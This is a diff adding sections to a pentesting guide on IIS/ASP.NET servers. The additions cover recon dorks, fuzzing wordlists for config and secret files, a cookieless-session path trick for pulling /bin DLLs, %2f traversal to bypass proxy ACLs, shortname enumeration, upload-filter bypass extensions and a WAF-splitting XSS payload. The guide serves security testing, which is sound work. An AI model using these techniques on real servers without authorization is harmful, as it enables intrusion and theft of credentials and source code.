Humiliating IIS Servers for Fun and Jail Time

src/network-services-pentesting/pentesting-web/iis-internet-information-services.md

@@ -53,6 +53,30 @@ More information and techniques to exploit this vulnerability [here](https://sor
 
 ## IIS Discovery Bruteforce
 
+### Passive discovery and active fingerprinting
+
+Before brute-forcing, try to identify IIS/ASP.NET hosts passively:
+
+```bash
+ssl:"target.com" http.title:"IIS"
+ssl.cert.subject.CN:"target.com" http.title:"IIS"
+org:"target" http.title:"IIS"
+site:target.com intitle:"IIS Windows Server"
+site:target.com inurl:aspnet_client
+site:target.com inurl:_vti_bin
+site:target.com ext:aspx | ext:ashx | ext:asmx
+```
+
+Also check the response headers directly or at scale:
+
+```bash
+nc -v target.com 80
+openssl s_client -connect target.com:443
+httpx -l targets.txt -td | grep IIS | tee iis-targets.txt
+```
+
+`Server: Microsoft-IIS/<version>` and `X-Powered-By: ASP.NET` are the common giveaways.
+
 Download the list that I have created:
 
 {{#file}}
@@ -70,6 +94,43 @@ It was created merging the contents of the following lists:
 
 Use it without adding any extension, the files that need it have it already.
 
+### IIS-specific files and extensions worth fuzzing
+
+Generic lists usually miss interesting .NET artifacts. Prioritise paths such as:
+
+```
+/web.config
+/web.config.bak
+/web.config.old
+/web.config.txt
+/global.asax
+/trace.axd
+/elmah.axd
+/connectionstrings.config
+/appsettings.json
+/appsettings.Development.json
+/appsettings.Staging.json
+/appsettings.Production.json
+/appsettings.Local.json
+/secrets.json
+/WS_FTP.LOG
+/_vti_pvt/service.cnf
+```
+
+Useful IIS extensions to add during content discovery: `.asp,.aspx,.ashx,.asmx,.wsdl,.wadl,.config,.xml,.zip,.txt,.dll,.json`
+
+```bash
+ffuf -u https://target.com/FUZZ -w iis-wordlist.txt \
+  -e .asp,.aspx,.ashx,.asmx,.config,.json,.xml,.zip,.bak,.txt \
+  -mc 200,301,302,403 -fs 0
+```
+
+IIS is case-insensitive, so normalise custom lists first:
+
+```bash
+tr '[:upper:]' '[:lower:]' | sort -u
+```
+
 ## Path Traversal
 
 ### Leaking source code
@@ -128,6 +189,18 @@ This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll**
 
 In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**.
 
+### Cookieless session path confusion → `/bin` DLL disclosure
+
+Legacy ASP.NET cookieless sessions accept path segments like `(S(X))`. IIS strips those segments during normalisation, which can sometimes expose DLLs from `/bin` even when direct access is denied:
+
+```http
+GET /(S(X))/b/(S(X))in/Newtonsoft.Json.dll
+GET /(S(X))/b/(S(X))in/WebApplication1.dll
+GET /(S(X))/b/(S(X))in/App_Code.dll
+```
+
+After downloading an application DLL, decompile it with dnSpy / dotPeek to recover controllers, routes, hardcoded credentials, API keys, and custom auth logic. Combine this with leaked `web.config` / `Views/web.config` files and the ASP.NET [ViewState exploitation notes](../../pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md) if you recover `<machineKey>` values.
+
 ### Common files
 
 From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
@@ -218,6 +291,20 @@ If you see an error like the following one:
 It means that the server **didn't receive the correct domain name** inside the Host header.\
 In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
 
+```bash
+ffuf -u https://TARGET_IP/ -H 'Host: FUZZ.target.com' -w vhosts.txt -fs 0
+```
+
+## Reverse proxy / IIS path normalisation confusion
+
+If IIS is behind a reverse proxy or WAF, test whether the proxy and IIS canonicalise the path differently:
+
+```
+/anything/..%2fadmin/
+```
+
+A front proxy may evaluate the request as `/anything/`, while IIS decodes `%2f` into `/`, resolves `..`, and serves `/admin/`. This is especially useful against path-based ACLs, admin panels, and internal-only routes.
+
 ## Decrypt encrypted configuration and ASP.NET Core Data Protection key rings
 
 Two common patterns to protect secrets on IIS-hosted .NET apps are:
@@ -367,6 +454,35 @@ You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
 
 A nice idea to **find the final name** of the discovered files is to **ask LLMs** for options like it's done in the script [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py)
 
+You can also use more modern tooling such as [shortscan](https://github.com/bitquark/shortscan):
+
+```bash
+shortscan https://target.com/ -F -p 1
+```
+
+Once you have fragments such as `SITEBA~1.ZIP` or `WEB~1.CON`, build a targeted wordlist instead of guessing blindly:
+
+- Search GitHub paths for matching prefixes/extensions (for example `path:/global*.asa` or `path:/connec*.config`).
+- Query BigQuery's public GitHub dataset for real filenames matching the 8.3 prefix.
+- Brute-force only the missing suffixes and separators with `ffuf`.
+
+```sql
+SELECT DISTINCT path
+FROM `bigquery-public-data.github_repos.files`
+WHERE REGEXP_CONTAINS(path, r'(?i)(\/siteba[a-z0-9]+\.zip|^siteba[a-z0-9]+\.zip)')
+LIMIT 1000
+```
+
+```bash
+ffuf -w wordlist.txt -u https://target.com/desktoFUZZ.zip -mc 200,301,302,403
+ffuf -w wordlist.txt -u https://target.com/desktop-FUZZ.zip -mc 200,301,302,403
+ffuf -w wordlist.txt -u https://target.com/desktop_FUZZ.zip -mc 200,301,302,403
+ffuf -w wordlist.txt -u https://target.com/desktop%20FUZZ.zip -mc 200,301,302,403
+ffuf -w wordlist.txt -u https://target.com/desktopFUZZ.zip -mc 200,301,302,403
+```
+
+The recovered names often lead to high-value files such as `web.config`, `global.asax`, archives, or custom admin directories. If the shortname-derived path becomes reachable via a file-read bug, continue with the [file inclusion/path traversal methodology](../../pentesting-web/file-inclusion/README.md).
+
 ### Basic Authentication bypass
 
 **Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
@@ -385,6 +501,27 @@ This information includes remote client IP's, session IDs, all request and respo
 
 ![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
 
+## IIS upload quirks
+
+If an upload filter only blocks `.asp` / `.aspx`, IIS may still serve attacker-controlled content from other extensions. For general upload methodology see [this page](../../pentesting-web/file-upload/README.md), but the IIS-specific checks are:
+
+- HTML-rendered extensions for stored XSS: `.cer`, `.hxt`, `.htm`
+- XML/XSS-capable extensions: `.dtd`, `.mno`, `.vml`, `.xsl`, `.xht`, `.svg`, `.xml`, `.xsd`, `.xsf`, `.svgz`, `.xslt`, `.wsdl`, `.xhtml`
+- SSI extensions worth testing for server-side processing: `.stm`, `.shtm`, `.shtml`
+- Trailing-dot normalisation bypasses: `shell.aspx.`, `shell.aspx..`, `shell.aspx...`
+
+A successful `web.config` or executable upload can escalate directly to RCE; otherwise these extensions are still useful for stored XSS and phishing content hosted on the target domain.
+
+## HTTP Parameter Pollution / WAF bypass
+
+ASP.NET often concatenates duplicate parameter values with commas, so try splitting blocked payloads across repeated parameters:
+
+```
+https://target.com/page?param=<svg/&param=onload=alert(1)>
+```
+
+This is useful when a WAF inspects each fragment independently but the backend later rebuilds the dangerous input. See the generic [parameter pollution page](../../pentesting-web/parameter-pollution.md) for more parsing behaviours.
+
 ## ASPXAUTH Cookie
 
 ASPXAUTH uses the following info:
@@ -424,6 +561,9 @@ HTTP/1.1 200 OK
 ## References
 
 - [0xdf – HTB Job (IIS write → ASPX shell → GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
+- [Humiliating IIS Servers for Fun and Jail Time](https://mll.sh/humiliating-iis-servers-for-fun-and-jail-time)
+- [shortscan](https://github.com/bitquark/shortscan)
+- [Assetnote – Finding Hidden Files and Folders on IIS Using BigQuery](https://www.assetnote.io/resources/research/finding-hidden-files-and-folders-on-iis-using-bigquery)
 - [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
 - [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)